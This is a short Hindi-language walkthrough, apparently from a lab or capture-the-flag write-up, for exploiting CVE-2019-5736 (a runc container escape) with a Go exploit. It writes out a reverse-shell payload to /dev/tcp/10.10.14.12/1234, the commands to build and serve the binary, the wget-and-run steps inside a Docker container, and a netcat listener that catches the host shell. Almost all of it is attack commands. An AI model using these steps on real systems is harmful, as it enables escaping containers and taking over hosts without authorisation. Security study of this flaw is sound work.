
Go-आधारित CVE-2019-5736 (Runc कंटेनर एस्केप) के लिए एक्सप्लॉइट, जिसमें अनुकूलन योग्य रिवर्स शेल पेलोड शामिल है, जो कमजोर Docker कंटेनरों के विरुद्ध पेनेट्रेशन टेस्टिंग और रेड टीम ऑपरेशन के लिए डिज़ाइन किया गया है।
🖥️ -h3x0v3rl0rd- #️⃣ CVE-2019-5736
मशीन CVE-2019-5736 के लिए संवेदनशील है, Runc एक्सप्लॉइट (CVE-2019-5736) के चरणों का पालन करें। main.go फ़ाइल डाउनलोड करें, फ़ाइल में पेलोड को इसमें बदलें:
var payload = "#!/bin/bash \n bash -i >& /dev/tcp/10.10.14.12/1234 0>&1"
उसके बाद, यह चलाएँ:
go build main.go
एक HTTP सर्वर होस्ट करें:
python3 -m http.server

फिर नीचे दिए अनुसार 3 टर्मिनल खोलें:

टर्मिनल 1
sudo /usr/bin/docker exec -it webapp-dev01 /bin/bash
wget http://10.10.14.12/main
chmod +x main
./main
टर्मिनल 2
sudo /usr/bin/docker exec -it webapp-dev01 /bin/sh
टर्मिनल 3
nc -nlvp 1234
जैसे ही आप पहले ssh टर्मिनल में ./main चलाएँ, तुरंत दूसरे ssh टर्मिनल में दूसरा कमांड चलाएँ, फिर आपको टर्मिनल 3 में netcat रिवर्स शेल मिलेगा।

